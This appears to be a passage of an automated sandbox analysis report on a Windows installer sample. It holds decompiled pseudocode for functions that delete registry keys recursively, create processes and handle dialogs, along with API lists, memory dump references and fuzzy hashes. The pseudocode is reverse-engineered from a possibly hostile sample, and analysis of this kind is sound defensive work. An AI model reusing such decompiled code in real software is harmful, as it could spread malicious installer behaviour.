                                                                                    0x73ca19de
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca19de
                                                                                    0x73ca1970
                                                                                    0x73ca1970
                                                                                    0x73ca1971
                                                                                    0x73ca19aa
                                                                                    0x73ca19ae
                                                                                    0x73ca19ca
                                                                                    0x73ca19cd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca19cf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca19d1
                                                                                    0x73ca19d3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca19d5
                                                                                    0x73ca19b0
                                                                                    0x73ca19b4
                                                                                    0x73ca19b6
                                                                                    0x73ca19b8
                                                                                    0x73ca19ba
                                                                                    0x73ca19c3
                                                                                    0x73ca19bc
                                                                                    0x73ca19bc
                                                                                    0x73ca19bc
                                                                                    0x00000000
                                                                                    0x73ca19ba
                                                                                    0x73ca1973
                                                                                    0x73ca1973
                                                                                    0x73ca1976
                                                                                    0x73ca19a3
                                                                                    0x73ca19a5
                                                                                    0x00000000
                                                                                    0x73ca19a5
                                                                                    0x73ca1978
                                                                                    0x73ca1978
                                                                                    0x73ca197b
                                                                                    0x73ca198b
                                                                                    0x73ca198f
                                                                                    0x73ca199c
                                                                                    0x73ca199e
                                                                                    0x00000000
                                                                                    0x73ca199e
                                                                                    0x73ca1991
                                                                                    0x73ca1993
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1995
                                                                                    0x73ca1998
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca199a
                                                                                    0x73ca197e
                                                                                    0x73ca197f
                                                                                    0x73ca1985
                                                                                    0x73ca1987
                                                                                    0x73ca1987
                                                                                    0x00000000
                                                                                    0x73ca197f
                                                                                    0x73ca18a8
                                                                                    0x73ca1920
                                                                                    0x73ca1922
                                                                                    0x73ca1925
                                                                                    0x73ca1943
                                                                                    0x73ca1946
                                                                                    0x73ca194c
                                                                                    0x73ca1951
                                                                                    0x73ca1927
                                                                                    0x73ca1927
                                                                                    0x73ca192b
                                                                                    0x73ca192f
                                                                                    0x73ca1931
                                                                                    0x73ca1931
                                                                                    0x73ca1954
                                                                                    0x73ca1957
                                                                                    0x00000000
                                                                                    0x73ca195d
                                                                                    0x73ca195d
                                                                                    0x73ca1960
                                                                                    0x00000000
                                                                                    0x73ca1960
                                                                                    0x73ca1957
                                                                                    0x73ca18aa
                                                                                    0x73ca18ad
                                                                                    0x73ca1911
                                                                                    0x73ca1913
                                                                                    0x73ca1915
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca191b
                                                                                    0x73ca18af
                                                                                    0x73ca18b2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca18b4
                                                                                    0x73ca18b5
                                                                                    0x73ca18eb
                                                                                    0x73ca18ef
                                                                                    0x73ca1907
                                                                                    0x73ca1909
                                                                                    0x00000000
                                                                                    0x73ca1909
                                                                                    0x73ca18f1
                                                                                    0x73ca18f3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca18f9
                                                                                    0x73ca18fc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1902
                                                                                    0x73ca18b7
                                                                                    0x73ca18ba
                                                                                    0x73ca18e1
                                                                                    0x00000000
                                                                                    0x73ca18bc
                                                                                    0x73ca18bc
                                                                                    0x73ca18bd
                                                                                    0x73ca18d1
                                                                                    0x73ca18d3
                                                                                    0x73ca18bf
                                                                                    0x73ca18c1
                                                                                    0x73ca18c7
                                                                                    0x73ca18c9
                                                                                    0x73ca18c9
                                                                                    0x73ca18c1
                                                                                    0x00000000
                                                                                    0x73ca18bd

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.241754228.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.241748462.0000000073CA0000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241762854.0000000073CA3000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241781372.0000000073CA5000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FreeGlobal
                                                                                    • String ID:
                                                                                    • API String ID: 2979337801-0
                                                                                    • Opcode ID: b5f90cece85a11474e6c74b372e1b3e0ec78581f353fbec2f318c3f54a315541
                                                                                    • Instruction ID: 9634596c7f9f991d25b7a7084f69184f9bde76de19557cf9609c8dee6df7aea1
                                                                                    • Opcode Fuzzy Hash: b5f90cece85a11474e6c74b372e1b3e0ec78581f353fbec2f318c3f54a315541
                                                                                    • Instruction Fuzzy Hash: 99512C32D0829BAFEB029FBDC8447ADBBBAEB44355F1E015AD407EB184C631AE41C751
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402A36, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 84%
                                                                                    			E00402A36(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A36(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405E88(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}








                                                                                    0x00402a57
                                                                                    0x00402a5f
                                                                                    0x00402a87
                                                                                    0x00402a71
                                                                                    0x00402ac1
                                                                                    0x00402ac7
                                                                                    0x00000000
                                                                                    0x00402ac9
                                                                                    0x00402a85
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402a85
                                                                                    0x00402a9c
                                                                                    0x00402aa4
                                                                                    0x00402aab
                                                                                    0x00402ad7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402adf
                                                                                    0x00402ae7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402ae7
                                                                                    0x00000000
                                                                                    0x00402aba
                                                                                    0x00402ace

                                                                                    APIs
                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1912718029-0
                                                                                    • Opcode ID: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                    • Instruction ID: 3ec7b1818cbfc33efeafaf7017db19c7c479205e5d6f4ff66fb244667a93d6f3
                                                                                    • Opcode Fuzzy Hash: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                    • Instruction Fuzzy Hash: 93112971A00009FFDF319F90DE49EAF7B7DEB44385B104436F905A10A0DBB59E51AE69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                    0x00401ccb
                                                                                    0x00401cd2
                                                                                    0x00401d01
                                                                                    0x00401d09
                                                                                    0x00401d10
                                                                                    0x00401d10
                                                                                    0x0040288e
                                                                                    0x0040289a

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                    • String ID:
                                                                                    • API String ID: 1849352358-0
                                                                                    • Opcode ID: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
                                                                                    • Instruction ID: de7316f9b9f1bcc3f0c1dff9ae5dc63c91f1472c52c052d8cf8a0da7f27950be
                                                                                    • Opcode Fuzzy Hash: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
                                                                                    • Instruction Fuzzy Hash: D5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004046F1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 51%
                                                                                    			E004046F1(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405B88(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405B88(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405B88(_t34, 0, 0x4204a0, 0x4204a0, _a8);
				wsprintfA(_t26 + lstrlenA(0x4204a0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x4204a0);
			}













                                                                                    0x004046f9
                                                                                    0x004046fd
                                                                                    0x00404705
                                                                                    0x00404708
                                                                                    0x00404709
                                                                                    0x0040470b
                                                                                    0x0040470d
                                                                                    0x00404710
                                                                                    0x00404710
                                                                                    0x00404717
                                                                                    0x0040471d
                                                                                    0x0040471d
                                                                                    0x00404724
                                                                                    0x0040472f
                                                                                    0x00404730
                                                                                    0x00404733
                                                                                    0x00404733
                                                                                    0x00404740
                                                                                    0x0040474b
                                                                                    0x0040474e
                                                                                    0x00404760
                                                                                    0x00404767
                                                                                    0x00404768
                                                                                    0x00404777
                                                                                    0x00404787
                                                                                    0x004047a3

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(004204A0,004204A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404611,000000DF,0000040F,00000400,00000000), ref: 0040477F
                                                                                    • wsprintfA.USER32 ref: 00404787
                                                                                    • SetDlgItemTextA.USER32 ref: 0040479A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                    • String ID: %u.%u%s%s
                                                                                    • API String ID: 3540041739-3551169577
                                                                                    • Opcode ID: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                    • Instruction ID: e1128f73888b2767c9277aed1687fd20c93e739cc52df1aac9c0a45a5a8dde9d
                                                                                    • Opcode Fuzzy Hash: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                    • Instruction Fuzzy Hash: 7311E2736001243BDB10666D9C46EEF3699DBC6335F14423BFA25F61D1E938AC5286A8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 51%
                                                                                    			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405AC4();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                    0x00401bb6
                                                                                    0x00401bc2
                                                                                    0x00401bc5
                                                                                    0x00401bce
                                                                                    0x00401bce
                                                                                    0x00401bd1
                                                                                    0x00401bd5
                                                                                    0x00401bde
                                                                                    0x00401bde
                                                                                    0x00401be1
                                                                                    0x00401be5
                                                                                    0x00401be7
                                                                                    0x00401c34
                                                                                    0x00401c36
                                                                                    0x00401c3f
                                                                                    0x00401c47
                                                                                    0x00401c4a
                                                                                    0x00401c4a
                                                                                    0x00401c53
                                                                                    0x00000000
                                                                                    0x00401be9
                                                                                    0x00401bf0
                                                                                    0x00401bf2
                                                                                    0x00401bfa
                                                                                    0x00401bfd
                                                                                    0x00401c25
                                                                                    0x00401c59
                                                                                    0x00401c59
                                                                                    0x00401bff
                                                                                    0x00401c0d
                                                                                    0x00401c15
                                                                                    0x00401c18
                                                                                    0x00401c18
                                                                                    0x00401bfd
                                                                                    0x00401c5c
                                                                                    0x00401c5f
                                                                                    0x00401c65
                                                                                    0x00402833
                                                                                    0x00402833
                                                                                    0x0040288e
                                                                                    0x0040289a

                                                                                    APIs
                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                    • SendMessageA.USER32 ref: 00401C25
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Timeout
                                                                                    • String ID: !
                                                                                    • API String ID: 1777923405-2657877971
                                                                                    • Opcode ID: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                    • Instruction ID: 67abd366a37910a3fb0c7fe19d632a25016d3899897cc5a5bd850e91adcb6683
                                                                                    • Opcode Fuzzy Hash: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                    • Instruction Fuzzy Hash: B721C4B1A44209BFEF01AFB4CE4AAAE7B75EF44344F14053EF602B60D1D6B84980E718
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004053C6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004053C6(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                    0x004053cf
                                                                                    0x004053eb
                                                                                    0x004053f3
                                                                                    0x004053f8
                                                                                    0x00000000
                                                                                    0x004053fe
                                                                                    0x00405402

                                                                                    APIs
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004053C6
                                                                                    • Error launching installer, xrefs: 004053D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcess
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                    • API String ID: 3712363035-7751565
                                                                                    • Opcode ID: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                    • Instruction ID: 069b69ca15cd8b990da55ccc95fe3be7356009797bdfa18ab8f6d6c8c96e71ef
                                                                                    • Opcode Fuzzy Hash: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                    • Instruction Fuzzy Hash: A3E0ECB4A00219BFDB00AF64ED49AAB7BBDEB00305F90C522A911E2150D775D8118AB9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405659, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405659(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                    0x0040565a
                                                                                    0x00405671
                                                                                    0x00405679
                                                                                    0x00405679
                                                                                    0x00405681

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 0040565F
                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405668
                                                                                    • lstrcatA.KERNEL32(?,00409010), ref: 00405679
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405659
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 2659869361-823278215
                                                                                    • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                    • Instruction ID: d5422d5486d5b384c4dcc02911800b35c31fcf4388d9dde419d5dff5703c7688
                                                                                    • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                    • Instruction Fuzzy Hash: 8BD05272605A202ED2022A258C05E9B7A28CF06311B044866B540B2292C6386D818AEE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 85%
                                                                                    			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029F6(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405AC4(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405AC4(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                                                    0x00401ec7
                                                                                    0x00401ecf
                                                                                    0x00401ed4
                                                                                    0x00401ed9
                                                                                    0x00401edd
                                                                                    0x00401ee0
                                                                                    0x00401ee2
                                                                                    0x00401ee9
                                                                                    0x00401ef2
                                                                                    0x00401efa
                                                                                    0x00401efd
                                                                                    0x00401f12
                                                                                    0x00401f18
                                                                                    0x00401f2b
                                                                                    0x00401f34
                                                                                    0x00401f40
                                                                                    0x00401f45
                                                                                    0x00401f45
                                                                                    0x00401f2b
                                                                                    0x00401f48
                                                                                    0x00401b75
                                                                                    0x00401b75
                                                                                    0x00401efd
                                                                                    0x0040288e
                                                                                    0x0040289a

                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                    • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                    • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                      • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1404258612-0
                                                                                    • Opcode ID: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                    • Instruction ID: 178fa6cf4330108057832d0c189c0e5a27020503733a18e797ef1cc5e9d7aef6
                                                                                    • Opcode Fuzzy Hash: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                    • Instruction Fuzzy Hash: 52113A71A00108BEDB01EFA5DD819AEBBB9EB48344B20853AF501F61E1D7389A54DB28
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 67%
                                                                                    			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af74->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
				 *0x40af84 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af8b = 1;
				 *0x40af88 = _t11 & 0x00000001;
				 *0x40af89 = _t11 & 0x00000002;
				 *0x40af8a = _t11 & 0x00000004;
				E00405B88(_t18, _t24, _t26, 0x40af90,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af74);
				_push(_t14);
				_push(_t26);
				E00405AC4();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                    0x00401d29
                                                                                    0x00401d42
                                                                                    0x00401d4c
                                                                                    0x00401d51
                                                                                    0x00401d5c
                                                                                    0x00401d63
                                                                                    0x00401d75
                                                                                    0x00401d7b
                                                                                    0x00401d80
                                                                                    0x00401d8a
                                                                                    0x004024b8
                                                                                    0x00401561
                                                                                    0x00402833
                                                                                    0x0040288e
